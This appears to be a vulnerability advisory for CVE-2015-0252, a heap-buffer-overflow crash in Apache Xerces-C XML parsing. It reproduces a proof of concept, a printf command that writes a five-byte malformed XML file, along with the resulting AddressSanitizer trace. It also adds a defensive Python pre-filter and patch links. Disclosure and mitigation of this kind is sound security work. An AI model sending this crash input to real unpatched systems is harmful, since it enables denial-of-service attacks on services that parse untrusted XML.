Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability
Affected Systems:
Apache Group Xerces C++ < 3.1.2
Description:
CVE (CAN) ID: CVE-2015-0252
Xerces is an open-source XML parsing project maintained by the Apache Software Foundation, with implementations in several languages, including Java, C++, Perl and COM.
Apache Xerces-C versions earlier than 3.1.2 contain a vulnerability in internal/XMLReader.cpp. A remote attacker can supply crafted XML data to cause a denial of service (segmentation fault and crash).
Source: vendor
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!
Vendor () provides the following test method:
# Exploit Title: Apache Xerces-c xml Parser (<3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendor Homepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE: CVE-2015-0252
Apache Xerces-c xml Parser Crashes on Malformed Input
I believe this to be the same issue that was reported on CVE-2015-0252. Posting this in case anyone is interested in reproducing it.
Original advisory:
https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt
$ printf "\xff\xfe\x00\x00\x3c" > file.xml
$ DOMPrint ./file.xml   # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault
$ ./DOMPrint ./file.xml   # using an ASan-enabled build
=================================================================
==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c at pc 0x836a721 bp 0xbf80000a8 sp 0xbf8000098
READ of size 1 at 0xb5d9d87c thread T0
    #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719
    #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761
    #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576
    #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223
    #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385
    #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608
    #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244
    #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206
    #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
    #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
    #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
    #11 0x8050bf2 in main src/DOMPrint.cpp:398
    #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
    #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)

0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c)
allocated by thread T0 here:
    #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)
    #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40
    #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68
    #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284
    #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198
    #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
    #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
    #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
    #8 0x8050bf2 in main src/DOMPrint.cpp:398
    #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer()
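As an added example (not code from this advisory or from the Xerces project), the following Python pre-filter applies the lesson of the PoC above to untrusted XML that must still pass through a pre-3.1.2 parser: it sniffs the byte-order mark, then rejects input whose body is not a whole number of code units or does not decode strictly. It generalises the single UTF-32LE case to every BOM listed in XML 1.0 Appendix F; the sample input is the PoC bytes, embedded in the block.

```python
"""Pre-filter for untrusted XML bytes before they reach a Xerces-C parser.

Constructed example: the only XML-specific knowledge used is the table of
byte-order marks from XML 1.0, Appendix F.
"""

# Longest marks first, so the UTF-32LE mark (FF FE 00 00) is not
# mis-read as the UTF-16LE mark (FF FE) followed by two NUL bytes.
_BOMS = (
    (b"\x00\x00\xfe\xff", "utf-32-be", 4),
    (b"\xff\xfe\x00\x00", "utf-32-le", 4),
    (b"\xef\xbb\xbf", "utf-8", 1),
    (b"\xfe\xff", "utf-16-be", 2),
    (b"\xff\xfe", "utf-16-le", 2),
)


def sniff_encoding(data: bytes):
    """Return (codec, code_unit_size, body_after_bom); no BOM means UTF-8."""
    for bom, codec, unit in _BOMS:
        if data.startswith(bom):
            return codec, unit, data[len(bom):]
    return "utf-8", 1, data


def check_xml_bytes(data: bytes) -> dict:
    """Decide whether the bytes are safe to hand to the parser.

    Returns {'codec', 'ok', 'reason'} so the caller can log rejections.
    Rejects an empty body, a body that is not a whole number of code units
    (the PoC: a UTF-32LE BOM followed by the single byte 0x3c), and any
    body the strict decoder refuses (truncated or invalid sequences).
    """
    codec, unit, body = sniff_encoding(data)
    verdict = {"codec": codec, "ok": False, "reason": ""}
    if not body:
        verdict["reason"] = "empty document after BOM"
        return verdict
    if len(body) % unit:
        verdict["reason"] = f"{len(body)} bytes is not a whole number of {unit}-byte units"
        return verdict
    try:
        body.decode(codec, errors="strict")
    except UnicodeDecodeError as exc:
        verdict["reason"] = f"undecodable {codec}: {exc.reason}"
        return verdict
    verdict["ok"] = True
    return verdict


if __name__ == "__main__":
    # The advisory's PoC bytes, embedded here rather than read from a file.
    print(check_xml_bytes(b"\xff\xfe\x00\x00\x3c"))
```

A filter like this narrows the malformed-input surface reachable from untrusted sources; upgrading to 3.1.2 remains the actual fix.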
Suggestion:
Vendor patch:
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt
http://svn.apache.org/viewvc?view=revision&revision=1667870